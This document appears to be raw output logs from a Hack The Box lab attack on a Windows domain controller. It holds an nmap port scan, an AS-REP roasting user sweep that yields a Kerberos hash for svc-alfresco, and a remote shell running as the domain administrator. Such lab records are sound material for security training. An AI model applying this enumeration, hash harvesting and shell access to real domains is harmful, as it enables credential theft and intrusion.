Nmap scan report for localhost (10.129.155.0) Host is up (0.22s latency). Not shown: 65511 closed ports PORT STATE SERVICE VERSION 53/tcp open domain Simple DNS Plus 88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2022-11-17 09:15:49Z) 135/tcp open msrpc Microsoft Windows RPC 139/tcp open netbios-ssn Microsoft Windows netbios-ssn 389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 445/tcp open microsoft-ds Windows Server 2016 Standard 14393 microsoft-ds (workgroup: HTB) 464/tcp open kpasswd5? 593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 636/tcp open tcpwrapped 3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: htb.local, Site: Default-First-Site-Name) 3269/tcp open tcpwrapped 5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 9389/tcp open mc-nmf .NET Message Framing 47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP) |_http-server-header: Microsoft-HTTPAPI/2.0 |_http-title: Not Found 49664/tcp open msrpc Microsoft Windows RPC 49665/tcp open msrpc Microsoft Windows RPC 49666/tcp open msrpc Microsoft Windows RPC 49667/tcp open msrpc Microsoft Windows RPC 49671/tcp open msrpc Microsoft Windows RPC 49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0 49677/tcp open msrpc Microsoft Windows RPC 49681/tcp open msrpc Microsoft Windows RPC 49699/tcp open msrpc Microsoft Windows RPC 63346/tcp open msrpc Microsoft Windows RPC No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ). TCP/IP fingerprint: OS:SCAN(V=7.91%E=4%D=11/17%OT=53%CT=1%CU=41013%PV=Y%DS=2%DC=T%G=Y%TM=6375FA OS:84%P=x86_64-apple-darwin20.2.0)SEQ(SP=107%GCD=1%ISR=10A%TI=I%CI=I%II=I%S OS:S=S%TS=A)OPS(O1=M539NW8ST11%O2=M539NW8ST11%O3=M539NW8NNT11%O4=M539NW8ST1 OS:1%O5=M539NW8ST11%O6=M539ST11)WIN(W1=2000%W2=2000%W3=2000%W4=2000%W5=2000 OS:%W6=2000)ECN(R=Y%DF=Y%T=80%W=2000%O=M539NW8NNS%CC=Y%Q=)T1(R=Y%DF=Y%T=80% OS:S=O%A=S+%F=AS%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=80%W=0%S=A%A=O%F=R%O=% OS:RD=0%Q=)T5(R=Y%DF=Y%T=80%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=80%W OS:=0%S=A%A=O%F=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=80%IPL=164%UN=0%RIPL=G%RI OS:D=G%RIPCK=G%RUCK=G%RUD=G)IE(R=Y%DFI=N%T=80%CD=Z)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked) [-] User HealthMailboxc3d7722 doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailboxfc9daad doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailboxc0a90c9 doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailbox670628e doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailbox968e74d doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailbox6ded678 doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailbox83d6781 doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailboxfd87238 doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailboxb01ac64 doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailbox7108a4e doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User HealthMailbox0659cc1 doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User sebastien doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User lucinda doesn't have UF_DONT_REQUIRE_PREAUTH set $krb5asrep$23$svc-alfresco@HTB.LOCAL:24f99a62416e8c41339649597df0e5ca$940878b4bf47618dddc63fc6229ec61d73dd91b5262d4b21724b12dd08bcc15c7ee8ce292012a94201a868889d698355e383765d283416246b88f36c7d0f19581776f5e6499486516b6d33119383eb81e31d1148bf2e8647f143d5254bf02a9bfcad83ae524b717bcef99a8e74075e29e241a71e41ddc3d7f37726a568ed621fc73f7729a4354a6dacc724051c53e71c82769ebfb0f84a0393f5945ace650396fbea62a315dd10e2cc06b6157c86ce4651e3cb62eb8440870bd020534d6285c4ae1b6f51b8d846bc97815198e9d00b434c87f8976fc3e1d7c0603e736e0ef239cc302a094515 [-] User andy doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User mark doesn't have UF_DONT_REQUIRE_PREAUTH set [-] User santi doesn't have UF_DONT_REQUIRE_PREAUTH set
[*] SMBv3.0 dialect used [!] Launching semi-interactive shell - Careful what you execute [!] Press help for extra shell commands C:\>whoami htb\administrator